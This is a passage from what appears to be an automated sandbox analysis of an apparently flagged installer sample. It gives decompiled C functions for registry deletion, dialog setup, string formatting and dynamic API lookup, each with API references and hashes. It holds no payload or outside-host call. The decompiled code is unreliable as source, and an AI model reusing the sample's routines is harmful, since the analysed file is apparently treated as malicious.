                                  					_t37 = E732F12CC(0x732f5044);
                                  					goto L10;
                                  				}
                                  			}











                                  0x732f2494
                                  0x732f2498
                                  0x732f24a3
                                  0x732f24a3
                                  0x732f24aa
                                  0x732f24af
                                  0x00000000
                                  0x00000000
                                  0x732f24b3
                                  0x732f24b6
                                  0x00000000
                                  0x00000000
                                  0x732f24bb
                                  0x732f24c6
                                  0x732f24d6
                                  0x00000000
                                  0x732f24cd
                                  0x732f24cf
                                  0x732f24e5
                                  0x00000000
                                  0x732f24e5
                                  0x732f24bd
                                  0x732f24bd
                                  0x732f24e6
                                  0x732f24e6
                                  0x732f24e8
                                  0x732f24ec
                                  0x732f24ec
                                  0x732f24ef
                                  0x732f24ef
                                  0x732f24f7
                                  0x732f24ff
                                  0x732f2502
                                  0x732f25c1
                                  0x732f25c2
                                  0x732f25cd
                                  0x732f25f7
                                  0x732f25f7
                                  0x732f25dd
                                  0x732f25e9
                                  0x732f25df
                                  0x732f25df
                                  0x732f25df
                                  0x00000000
                                  0x732f2508
                                  0x732f2508
                                  0x00000000
                                  0x732f250f
                                  0x00000000
                                  0x00000000
                                  0x732f2517
                                  0x00000000
                                  0x00000000
                                  0x732f2525
                                  0x732f2527
                                  0x00000000
                                  0x00000000
                                  0x732f2548
                                  0x732f254e
                                  0x732f2551
                                  0x732f2553
                                  0x732f2563
                                  0x00000000
                                  0x00000000
                                  0x732f2530
                                  0x732f2535
                                  0x732f2538
                                  0x732f2539
                                  0x00000000
                                  0x00000000
                                  0x732f256f
                                  0x732f2575
                                  0x732f2576
                                  0x732f2579
                                  0x732f257a
                                  0x732f257c
                                  0x00000000
                                  0x00000000
                                  0x732f2588
                                  0x732f258b
                                  0x732f2597
                                  0x732f2599
                                  0x00000000
                                  0x00000000
                                  0x732f25a5
                                  0x732f25b1
                                  0x732f25b4
                                  0x732f25b6
                                  0x732f25b9
                                  0x00000000
                                  0x00000000
                                  0x732f2508
                                  0x732f2502
                                  0x732f24db
                                  0x732f24e0
                                  0x00000000
                                  0x732f24e0

                                  APIs
                                  • GlobalFree.KERNEL32 ref: 732F25C2
                                    • Part of subcall function 732F12CC: lstrcpynW.KERNEL32(00000000,?,732F137F,00000019,732F11CA,-000000A0), ref: 732F12DC
                                  • GlobalAlloc.KERNEL32(00000040), ref: 732F2548
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 732F2563
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.778451619.00000000732F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732F0000, based on PE: true
                                  • Associated: 00000000.00000002.778443971.00000000732F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778458851.00000000732F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778463521.00000000732F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_732f0000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                  • String ID:
                                  • API String ID: 4216380887-0
                                  • Opcode ID: b22d26209bcaf930cddb1c32b7020ccdff0f4bb5da35dee0d4f698ef050a3073
                                  • Instruction ID: 31a851d4e2560dd37c1fabc7ffc80a0d88f1e9d230663b3ee6460673dda83673
                                  • Opcode Fuzzy Hash: b22d26209bcaf930cddb1c32b7020ccdff0f4bb5da35dee0d4f698ef050a3073
                                  • Instruction Fuzzy Hash: 0641BEB910870BEFE718EF25D854B26F7F8FB49320F10891DE84A86580E7B4A5C4CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 48%
                                  			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                  				void* _v8;
                                  				int _v12;
                                  				short _v536;
                                  				void* _t27;
                                  				signed int _t33;
                                  				intOrPtr* _t35;
                                  				signed int _t45;
                                  				signed int _t46;
                                  				signed int _t47;
                                  
                                  				_t46 = _a12;
                                  				_t47 = _t46 & 0x00000300;
                                  				_t45 = _t46 & 0x00000001;
                                  				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                  				if(_t27 == 0) {
                                  					if((_a12 & 0x00000002) == 0) {
                                  						L3:
                                  						_push(0x105);
                                  						_push( &_v536);
                                  						_push(0);
                                  						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                  							__eflags = _t45;
                                  							if(__eflags != 0) {
                                  								L10:
                                  								RegCloseKey(_v8);
                                  								return 0x3eb;
                                  							}
                                  							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                  							__eflags = _t33;
                                  							if(_t33 != 0) {
                                  								break;
                                  							}
                                  							_push(0x105);
                                  							_push( &_v536);
                                  							_push(_t45);
                                  						}
                                  						RegCloseKey(_v8);
                                  						_t35 = E0040690A(3);
                                  						if(_t35 != 0) {
                                  							return  *_t35(_a4, _a8, _t47, 0);
                                  						}
                                  						return RegDeleteKeyW(_a4, _a8);
                                  					}
                                  					_v12 = 0;
                                  					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                  						goto L10;
                                  					}
                                  					goto L3;
                                  				}
                                  				return _t27;
                                  			}












                                  0x00402eb4
                                  0x00402ebd
                                  0x00402ec6
                                  0x00402ed2
                                  0x00402edb
                                  0x00402ee5
                                  0x00402f0a
                                  0x00402f10
                                  0x00402f15
                                  0x00402f16
                                  0x00402f46
                                  0x00402f1f
                                  0x00402f21
                                  0x00402f71
                                  0x00402f74
                                  0x00000000
                                  0x00402f7a
                                  0x00402f30
                                  0x00402f35
                                  0x00402f37
                                  0x00000000
                                  0x00000000
                                  0x00402f3f
                                  0x00402f44
                                  0x00402f45
                                  0x00402f45
                                  0x00402f52
                                  0x00402f5a
                                  0x00402f61
                                  0x00000000
                                  0x00402f8a
                                  0x00000000
                                  0x00402f69
                                  0x00402ef5
                                  0x00402f08
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402f08
                                  0x00402f90

                                  APIs
                                  • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: CloseEnum$DeleteValue
                                  • String ID:
                                  • API String ID: 1354259210-0
                                  • Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                  • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                  • Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                  • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00401D81(void* __ebx, void* __edx) {
                                  				struct HWND__* _t30;
                                  				WCHAR* _t38;
                                  				void* _t48;
                                  				void* _t53;
                                  				signed int _t55;
                                  				signed int _t60;
                                  				long _t63;
                                  				void* _t65;
                                  
                                  				_t53 = __ebx;
                                  				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                  					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                  				} else {
                                  					E00402D84(2);
                                  					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                  				}
                                  				_t55 =  *(_t65 - 0x24);
                                  				 *(_t65 + 8) = _t30;
                                  				_t60 = _t55 & 0x00000004;
                                  				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                  				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                  				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                  				if((_t55 & 0x00010000) == 0) {
                                  					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                  				} else {
                                  					_t38 = E00402DA6(0x11);
                                  				}
                                  				 *(_t65 - 0x44) = _t38;
                                  				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                  				asm("sbb esi, esi");
                                  				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                  				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                  				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                  					DeleteObject(_t48);
                                  				}
                                  				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                  					_push(_t63);
                                  					E00406484();
                                  				}
                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                                  				return 0;
                                  			}











                                  0x00401d81
                                  0x00401d85
                                  0x00401d9a
                                  0x00401d87
                                  0x00401d89
                                  0x00401d8f
                                  0x00401d8f
                                  0x00401da0
                                  0x00401da3
                                  0x00401dad
                                  0x00401db0
                                  0x00401db8
                                  0x00401dc9
                                  0x00401dcc
                                  0x00401dd7
                                  0x00401dce
                                  0x00401dd0
                                  0x00401dd0
                                  0x00401ddb
                                  0x00401de5
                                  0x00401e0c
                                  0x00401e1b
                                  0x00401e29
                                  0x00401e31
                                  0x00401e39
                                  0x00401e39
                                  0x00401e42
                                  0x00401e48
                                  0x00402ba4
                                  0x00402ba4
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • GetDlgItem.USER32 ref: 00401D9A
                                  • GetClientRect.USER32(?,?), ref: 00401DE5
                                  • LoadImageW.USER32 ref: 00401E15
                                  • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                  • DeleteObject.GDI32(00000000), ref: 00401E39
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                  • String ID:
                                  • API String ID: 1849352358-0
                                  • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                  • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                  • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                  • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 73%
                                  			E00401E4E(intOrPtr __edx) {
                                  				void* __edi;
                                  				int _t9;
                                  				signed char _t15;
                                  				struct HFONT__* _t18;
                                  				intOrPtr _t30;
                                  				void* _t31;
                                  				struct HDC__* _t33;
                                  				void* _t35;
                                  
                                  				_t30 = __edx;
                                  				_t33 = GetDC( *(_t35 - 8));
                                  				_t9 = E00402D84(2);
                                  				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                  				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                  				ReleaseDC( *(_t35 - 8), _t33);
                                  				 *0x40ce00 = E00402D84(3);
                                  				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                  				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                  				 *0x40ce07 = 1;
                                  				 *0x40ce04 = _t15 & 0x00000001;
                                  				 *0x40ce05 = _t15 & 0x00000002;
                                  				 *0x40ce06 = _t15 & 0x00000004;
                                  				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
                                  				_t18 = CreateFontIndirectW(0x40cdf0);
                                  				_push(_t18);
                                  				_push(_t31);
                                  				E00406484();
                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                  				return 0;
                                  			}











                                  0x00401e4e
                                  0x00401e59
                                  0x00401e5b
                                  0x00401e68
                                  0x00401e7f
                                  0x00401e84
                                  0x00401e91
                                  0x00401e96
                                  0x00401e9a
                                  0x00401ea5
                                  0x00401eac
                                  0x00401ebe
                                  0x00401ec4
                                  0x00401ec9
                                  0x00401ed3
                                  0x00402638
                                  0x0040156d
                                  0x00402ba4
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • GetDC.USER32(?), ref: 00401E51
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                  • ReleaseDC.USER32 ref: 00401E84
                                    • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                    • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,00000000), ref: 00406779
                                  • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2584051700-0
                                  • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                  • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                  • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                  • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E732F16BD(struct HINSTANCE__* _a4, short* _a8) {
                                  				_Unknown_base(*)()* _t7;
                                  				void* _t10;
                                  				int _t14;
                                  
                                  				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                  				_t10 = GlobalAlloc(0x40, _t14);
                                  				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                  				_t7 = GetProcAddress(_a4, _t10);
                                  				GlobalFree(_t10);
                                  				return _t7;
                                  			}






                                  0x732f16d7
                                  0x732f16e3
                                  0x732f16f0
                                  0x732f16f7
                                  0x732f1700
                                  0x732f170c

                                  APIs
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,732F22D8,?,00000808), ref: 732F16D5
                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,732F22D8,?,00000808), ref: 732F16DC
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,732F22D8,?,00000808), ref: 732F16F0
                                  • GetProcAddress.KERNEL32(732F22D8,00000000), ref: 732F16F7
                                  • GlobalFree.KERNEL32 ref: 732F1700
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.778451619.00000000732F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732F0000, based on PE: true
                                  • Associated: 00000000.00000002.778443971.00000000732F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778458851.00000000732F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778463521.00000000732F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_732f0000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                  • String ID:
                                  • API String ID: 1148316912-0
                                  • Opcode ID: 2f47ed3572a7f19bec51e5080b84b4f43a9d7fa6837d7ca83b07f28ea40f59bc
                                  • Instruction ID: afa74a8aa217edf417a68f72ca789709fa11d09a281812a7ec2e1717b6d6368e
                                  • Opcode Fuzzy Hash: 2f47ed3572a7f19bec51e5080b84b4f43a9d7fa6837d7ca83b07f28ea40f59bc
                                  • Instruction Fuzzy Hash: 7AF0AC732061397BD62126AB8C4CEABBE9CDF8B6F5B214215F62C9219086A15D01E7F1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                  				char _v68;
                                  				char _v132;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t23;
                                  				signed int _t24;
                                  				void* _t31;
                                  				void* _t33;
                                  				void* _t34;
                                  				void* _t44;
                                  				signed int _t46;
                                  				signed int _t50;
                                  				signed int _t52;
                                  				signed int _t53;
                                  				signed int _t55;
                                  
                                  				_t23 = _a16;
                                  				_t53 = _a12;
                                  				_t44 = 0xffffffdc;
                                  				if(_t23 == 0) {
                                  					_push(0x14);
                                  					_pop(0);
                                  					_t24 = _t53;
                                  					if(_t53 < 0x100000) {
                                  						_push(0xa);
                                  						_pop(0);
                                  						_t44 = 0xffffffdd;
                                  					}
                                  					if(_t53 < 0x400) {
                                  						_t44 = 0xffffffde;
                                  					}
                                  					if(_t53 < 0xffff3333) {
                                  						_t52 = 0x14;
                                  						asm("cdq");
                                  						_t24 = 1 / _t52 + _t53;
                                  					}
                                  					_t25 = _t24 & 0x00ffffff;
                                  					_t55 = _t24 >> 0;
                                  					_t46 = 0xa;
                                  					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                  				} else {
                                  					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                  					_t50 = 0;
                                  				}
                                  				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                  				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                                  				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                                  				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                  				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                                  			}



















                                  0x00404d4f
                                  0x00404d54
                                  0x00404d5c
                                  0x00404d5d
                                  0x00404d6a
                                  0x00404d72
                                  0x00404d73
                                  0x00404d75
                                  0x00404d77
                                  0x00404d79
                                  0x00404d7c
                                  0x00404d7c
                                  0x00404d83
                                  0x00404d89
                                  0x00404d89
                                  0x00404d90
                                  0x00404d97
                                  0x00404d9a
                                  0x00404d9d
                                  0x00404d9d
                                  0x00404da1
                                  0x00404db1
                                  0x00404db3
                                  0x00404db6
                                  0x00404d5f
                                  0x00404d5f
                                  0x00404d66
                                  0x00404d66
                                  0x00404dbe
                                  0x00404dc9
                                  0x00404ddf
                                  0x00404df0
                                  0x00404e0c

                                  APIs
                                  • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                  • wsprintfW.USER32 ref: 00404DF0
                                  • SetDlgItemTextW.USER32 ref: 00404E03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: ItemTextlstrlenwsprintf
                                  • String ID: %u.%u%s%s
                                  • API String ID: 3540041739-3551169577
                                  • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                  • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                  • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                  • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00405E0C(WCHAR* _a4) {
                                  				WCHAR* _t9;
                                  
                                  				_t9 = _a4;
                                  				_push( &(_t9[lstrlenW(_t9)]));
                                  				_push(_t9);
                                  				if( *(CharPrevW()) != 0x5c) {
                                  					lstrcatW(_t9, 0x40a014);
                                  				}
                                  				return _t9;
                                  			}




                                  0x00405e0d
                                  0x00405e1a
                                  0x00405e1b
                                  0x00405e26
                                  0x00405e2e
                                  0x00405e2e
                                  0x00405e36

                                  APIs
                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrcatlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 2659869361-3081826266
                                  • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                  • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                  • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                  • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E732F10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                  				void* _v0;
                                  				void* _t27;
                                  				signed int _t29;
                                  				void* _t30;
                                  				void* _t34;
                                  				void* _t36;
                                  				void* _t38;
                                  				void* _t40;
                                  				void* _t48;
                                  				void* _t54;
                                  				void* _t63;
                                  				void* _t64;
                                  				signed int _t66;
                                  				void* _t67;
                                  				void* _t73;
                                  				void* _t74;
                                  				void* _t77;
                                  				void* _t80;
                                  				void _t81;
                                  				void _t82;
                                  				intOrPtr _t84;
                                  				void* _t86;
                                  				void* _t88;
                                  
                                  				 *0x732f506c = _a8;
                                  				 *0x732f5070 = _a16;
                                  				 *0x732f5074 = _a12;
                                  				_a12( *0x732f5048, E732F1651, _t73);
                                  				_t66 =  *0x732f506c +  *0x732f506c * 4 << 3;
                                  				_t27 = E732F12E3();
                                  				_v0 = _t27;
                                  				_t74 = _t27;
                                  				if( *_t27 == 0) {
                                  					L28:
                                  					return GlobalFree(_t27);
                                  				}
                                  				do {
                                  					_t29 =  *_t74 & 0x0000ffff;
                                  					_t67 = 2;
                                  					_t74 = _t74 + _t67;
                                  					_t88 = _t29 - 0x66;
                                  					if(_t88 > 0) {
                                  						_t30 = _t29 - 0x6c;
                                  						if(_t30 == 0) {
                                  							L23:
                                  							_t31 =  *0x732f5040;
                                  							if( *0x732f5040 == 0) {
                                  								goto L26;
                                  							}
                                  							E732F1603( *0x732f5074, _t31 + 4, _t66);
                                  							_t34 =  *0x732f5040;
                                  							_t86 = _t86 + 0xc;
                                  							 *0x732f5040 =  *_t34;
                                  							L25:
                                  							GlobalFree(_t34);
                                  							goto L26;
                                  						}
                                  						_t36 = _t30 - 4;
